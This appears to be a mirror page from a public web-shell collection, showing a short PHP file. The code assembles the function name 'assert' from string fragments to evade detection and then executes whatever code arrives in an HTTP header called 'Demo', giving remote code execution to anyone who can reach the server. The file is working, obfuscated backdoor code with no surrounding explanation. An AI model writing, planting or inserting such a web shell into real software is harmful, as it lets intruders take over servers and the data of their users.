mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
9 lines
93 B
PHP
9 lines
93 B
PHP
|
<?php
|
||
|
session_start();
|
||
|
$a = "a";
|
||
|
$s = "s";
|
||
|
$c=$a.$s."sert";
|
||
|
$c(getallheaders()['Demo']);
|
||
|
|
||
|
?>
|